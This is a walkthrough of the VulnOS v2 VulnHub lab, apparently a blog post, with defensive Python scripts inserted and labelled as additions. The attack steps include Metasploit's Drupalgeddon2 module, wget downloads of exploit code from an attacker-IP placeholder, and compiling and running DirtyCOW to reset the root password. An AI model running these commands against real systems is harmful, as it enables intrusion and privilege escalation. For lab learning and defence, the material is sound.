VulnOS By Vulnhub Walkthrough

Hello guys, welcome back to my walkthrough blog. Let’s get started.

Akash Falaskar
4 min read · Oct 1, 2023

First, identify the target IP; Netdiscover does this. Once we have the target IP, let's scan it with Nmap using the following flags:

  • -sC: Scan with default NSE scripts
  • -sV: Get protocol versions
  • -p-: Scan all ports
  • -oN example.txt: Output the results to a file named example.txt
┌─[ghost@windows]─[~]  
└──╼ $nmap -sC -sV -p- -oN vulnos.txt 192.168.0.106
Nmap scan report for 192.168.0.106
Host is up (0.00017s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f54dc8e78bc1b2119524fd0e4c3c3b3b (DSA)
| 2048 ff19337ac1eeb5d0dc6651daf06efc48 (RSA)
| 256 aed76fcced4a828be866a5117a115f86 (ECDSA)
|_ 256 71bc6b7b5602a48ece1c8ea61e3a3794 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: VulnOSv2
|_http-server-header: Apache/2.4.7 (Ubuntu)
6667/tcp open irc ngircd
MAC Address: 08:00:27:58:90:25 (Oracle VirtualBox virtual NIC)
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
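
The scan above produces Nmap's normal (-oN) format, which is written for people rather than programs. As an added example that is not part of the original post, the parser below turns that format into records a defender can check against an asset baseline: it attaches NSE script output (ssh-hostkey, http-title) to the port it belongs to, lists open ports that are not on the approved list, and flags SSH host keys of a type or size that should be retired (DSA keys were disabled by default in OpenSSH 7.0). The sample input is the scan output shown above, embedded so the script runs offline; the allowed-port set and the 2048-bit RSA threshold are assumptions chosen for the example.

```python
import re
from dataclasses import dataclass, field

# Sample input for offline runs: the -oN output of the scan above, embedded
# verbatim. Column spacing in this format varies, so fields are split on
# whitespace rather than by position.
SAMPLE_NMAP = """\
Nmap scan report for 192.168.0.106
Host is up (0.00017s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f54dc8e78bc1b2119524fd0e4c3c3b3b (DSA)
| 2048 ff19337ac1eeb5d0dc6651daf06efc48 (RSA)
|_ 256 71bc6b7b5602a48ece1c8ea61e3a3794 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: VulnOSv2
|_http-server-header: Apache/2.4.7 (Ubuntu)
6667/tcp open irc ngircd
MAC Address: 08:00:27:58:90:25 (Oracle VirtualBox virtual NIC)
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^([A-Za-z][\w-]*):\s*(.*)$")   # "script-id: first line"
KEY_RE = re.compile(r"^(\d+)\s+\S+\s+\((\w+)\)$")        # "bits fingerprint (TYPE)"


@dataclass
class Service:
    host: str
    port: int
    proto: str
    state: str
    name: str
    version: str
    scripts: dict = field(default_factory=dict)  # NSE script id -> output lines


def parse_nmap(text):
    """Turn -oN output into Service records; NSE lines attach to the preceding port."""
    services, host, current, script = [], None, None, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host, current, script = m.group(1), None, None
            continue
        m = PORT_RE.match(line)
        if m:
            current = Service(host, int(m.group(1)), m.group(2), m.group(3),
                              m.group(4), m.group(5).strip())
            services.append(current)
            script = None
            continue
        if current is not None and line.startswith("|"):
            body = line.lstrip("|_").strip()
            m = SCRIPT_RE.match(body)
            if m:                       # a new script block starts here
                script = m.group(1)
                current.scripts[script] = [m.group(2)] if m.group(2) else []
            elif script is not None:    # continuation line of the current script
                current.scripts[script].append(body)
    return services


def unexpected_services(services, allowed_ports):
    """Open ports outside the host's approved baseline (assumed set passed by the caller)."""
    return [s for s in services if s.state == "open" and s.port not in allowed_ports]


def weak_hostkeys(services, min_rsa_bits=2048):
    """ssh-hostkey entries that are DSA or RSA shorter than the assumed minimum."""
    flagged = []
    for s in services:
        for line in s.scripts.get("ssh-hostkey", []):
            m = KEY_RE.match(line)
            if not m:
                continue
            bits, ktype = int(m.group(1)), m.group(2)
            if ktype == "DSA" or (ktype == "RSA" and bits < min_rsa_bits):
                flagged.append((s.port, bits, ktype))
    return flagged


if __name__ == "__main__":
    svcs = parse_nmap(SAMPLE_NMAP)
    for s in svcs:
        print(f"{s.host}:{s.port}/{s.proto} {s.state} {s.name} {s.version}")
    print("not in baseline:", [s.port for s in unexpected_services(svcs, {22, 80})])
    print("weak host keys:", weak_hostkeys(svcs))
```

The normal format is not strictly structured (a multi-line script whose continuation line happens to look like "word: value" would be read as a new script), so for anything beyond a quick triage parse the -oX XML output instead; the checks above work the same way on either.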

As you can see, the output of Nmap shows that SSH is open and there is a webpage running on the target. Let’s check out the webpage.

The webpage shows that we can find the root flag on this website.

Open the website and you will see the webpage. The favicon shows that it is a Drupal site, and we can find the Drupal version in the source of the content page. A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is Drupal core — Highly critical — Remote Code Execution. So let's fire up Metasploit.
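
The identification step above (CMS from the favicon, exact version from page source) is something a defender should automate for every Drupal site in an inventory. As an added example that is not part of the original post, the script below reads the Generator meta tag that Drupal 7 emits in the page head, reads the exact release from the first line of Drupal 7's CHANGELOG.txt, and compares it with the releases that shipped the fix for the Drupal core RCE advisory the post refers to (SA-CORE-2018-002: Drupal 7.58, 8.5.1, 8.4.6 and 8.3.9; these numbers come from the Drupal advisory, not from this page). The HTML and changelog samples are constructed.

```python
import re

# Constructed sample of a Drupal 7 page head; the Generator meta tag is emitted by default.
SAMPLE_HTML = """<html><head>
<meta name="Generator" content="Drupal 7 (http://drupal.org)" />
<title>VulnOSv2</title></head><body></body></html>"""

# Constructed sample of the top of Drupal 7's CHANGELOG.txt; the first line names the release.
SAMPLE_CHANGELOG = """Drupal 7.26, 2014-01-15
-----------------------
- Constructed changelog entry for the example.
"""

GENERATOR_RE = re.compile(r'<meta\s+name="generator"\s+content="Drupal\s+(\d+)', re.I)
CHANGELOG_RE = re.compile(r"^Drupal\s+(\d+(?:\.\d+)+)", re.M)

# Releases that shipped the SA-CORE-2018-002 fix (from the advisory, not this page),
# keyed by branch: 7.x is one branch, 8.x is patched per minor branch.
FIXED = {(7,): (7, 58), (8, 3): (8, 3, 9), (8, 4): (8, 4, 6), (8, 5): (8, 5, 1)}


def drupal_major_from_html(html):
    """Major version from the Generator meta tag, or None if the tag is absent."""
    m = GENERATOR_RE.search(html)
    return int(m.group(1)) if m else None


def drupal_version_from_changelog(text):
    """Exact release as a tuple of ints, e.g. (7, 26), or None if not found."""
    m = CHANGELOG_RE.search(text)
    return tuple(int(x) for x in m.group(1).split(".")) if m else None


def is_patched(version):
    """True if the release carries the SA-CORE-2018-002 fix for its branch."""
    branch = version[:1] if version[0] == 7 else version[:2]
    fixed = FIXED.get(branch)
    if fixed is None:
        # Branches created after the fix (8.6 and later) carry it; unlisted older
        # branches were already end-of-life and never received it.
        return version[:2] >= (8, 6)
    return version >= fixed


def assess(html, changelog):
    """Summary a defender would record per site: major, exact release, patched or not."""
    version = drupal_version_from_changelog(changelog)
    return {
        "major": drupal_major_from_html(html),
        "version": version,
        "patched": is_patched(version) if version else None,
    }


if __name__ == "__main__":
    print(assess(SAMPLE_HTML, SAMPLE_CHANGELOG))
```

Drupal 7 shipped CHANGELOG.txt at the web root, but hardened sites often remove it and some also strip the Generator tag, so a missing value means "unknown", not "safe"; the authoritative check is the version reported by the site's own update status module.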

msfconsole
search drupal

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution


use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts <target ip>
set targeturi /jabc
run

Voilà! We got a shell, but we can't access any of the home directories. Webmin and VulnOS are installed, so we can go to the /tmp folder and download the Linux Exploit Suggester to identify which exploit to use against this machine. You can find the Linux Exploit Suggester on GitHub; clone it on the attacker's machine.

git clone https://github.com/The-Z-Labs/linux-exploit-suggester.git
cd linux-exploit-suggester

To serve the script, start a SimpleHTTPServer on the attacker machine (this is the Python 2 module; on Python 3 the equivalent is python3 -m http.server 80):

sudo python -m SimpleHTTPServer 80

Then, back in the shell we obtained through msfconsole, fetch the script from the attacker machine and run it:

cd /tmp
wget http://<attacker-ip>/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
Available information:

Kernel version: 3.13.0
Architecture: i686
Distribution: ubuntu
Distribution version: 14.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

81 kernel space exploits
49 user space exploits

Possible Exploits:

cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe

[+] [CVE-2016-5195] dirtycow

Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

The Linux Exploit Suggester searched 81 kernel space exploits and 49 user space exploits and reported two candidates. We will focus on those two, specifically the second one, DirtyCOW 2. The exploit can be downloaded from the following URL: https://www.exploit-db.com/download/40847

We can rename the downloaded exploit to cow.cpp:

 $ mv 40847.cpp cow.cpp

As before, we fetch cow.cpp into the shell on the target and compile it with the following commands:

wget http://<attacker-ip>/cow.cpp
chmod 777 cow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow cow.cpp -lutil
chmod 777 dcow
./dcow
Running ...
Received su prompt (Password: )
Root password is: dirtyCowFun
Enjoy! :-)

As you can see, the exploit changes the root password. So we can either switch to root in the current shell with su and type that password, or log in over SSH as root. I'll use SSH.
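
The "Root password is: dirtyCowFun" line above comes from the exploit rewriting root's entry in /etc/passwd: the 40847 variant writes a new password hash straight into that file, which is why the root password changes without /etc/shadow being touched. The two things a defender can check for that outcome are simple: no account in /etc/passwd should carry a hash in its password field (it should be x, with the hash in /etc/shadow), and no account other than root should have UID 0. As an added example that is not part of the original post, the audit below applies both checks and diffs the file against a known-good copy, which is what a file integrity monitor alerts on. Both passwd samples are constructed.

```python
# Constructed sample of a healthy /etc/passwd: every password field is 'x',
# meaning the real hash lives in /etc/shadow (readable only by root).
BASELINE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""

# Constructed sample of a tampered copy: root's password field now holds a hash
# (so /etc/shadow is bypassed) and a second UID-0 account has appeared.
TAMPERED = """\
root:$6$CONSTRUCTEDSALT$CONSTRUCTEDHASH:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
extra:x:0:0::/root:/bin/bash
"""

FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text):
    """Split passwd lines into dicts; malformed lines are returned separately."""
    entries, bad = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) != len(FIELDS):
            bad.append((lineno, line))
            continue
        entries.append(dict(zip(FIELDS, parts)))
    return entries, bad


def audit_passwd(text):
    """Return human-readable findings; an empty list means nothing suspicious."""
    entries, bad = parse_passwd(text)
    findings = [f"line {n}: malformed entry {line!r}" for n, line in bad]
    for e in entries:
        pw = e["passwd"]
        if pw == "":
            findings.append(f"{e['name']}: empty password field (login without a password)")
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # Anything else is a hash sitting in a world-readable file.
            findings.append(f"{e['name']}: password hash stored in /etc/passwd instead of /etc/shadow")
        if e["uid"] == "0" and e["name"] != "root":
            findings.append(f"{e['name']}: extra UID 0 account")
    return findings


def diff_passwd(baseline, current):
    """Account-level diff against a known-good copy: (added, removed, changed) user names."""
    old = {e["name"]: e for e in parse_passwd(baseline)[0]}
    new = {e["name"]: e for e in parse_passwd(current)[0]}
    added = set(new) - set(old)
    removed = set(old) - set(new)
    changed = {n for n in old.keys() & new.keys() if old[n] != new[n]}
    return added, removed, changed


if __name__ == "__main__":
    import sys
    # Run against the live file (or a path given on the command line) on a host you administer.
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd"
    with open(path) as fh:
        findings = audit_passwd(fh.read())
    print("\n".join(findings) or f"{path}: no findings")
```

On a real host the baseline would be the copy taken at build time (or the hash recorded by AIDE, osquery or a similar tool); the point of the diff is that a changed root entry is a single, unambiguous alert, whereas the audit alone cannot tell a legitimate hash-in-passwd legacy configuration from the tampering shown above.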

ssh root@192.168.0.106
root@192.168.0.106's password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Sat Sep 30 21:50:00 CEST 2023
System load: 0.0 Memory usage: 2% Processes: 66
Usage of /: 5.8% of 29.91GB Swap usage: 0% Users logged in: 0

=> There is 1 zombie process.

Graph this data and manage this system at:
https://landscape.canonical.com/

root@VulnOSv2:~# ls
flag.txt
root@VulnOSv2:~# cat flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?

Voilà! We can get root access.

Akash Falaskar

Penetration Tester | Cybersecurity Content Creator and Writer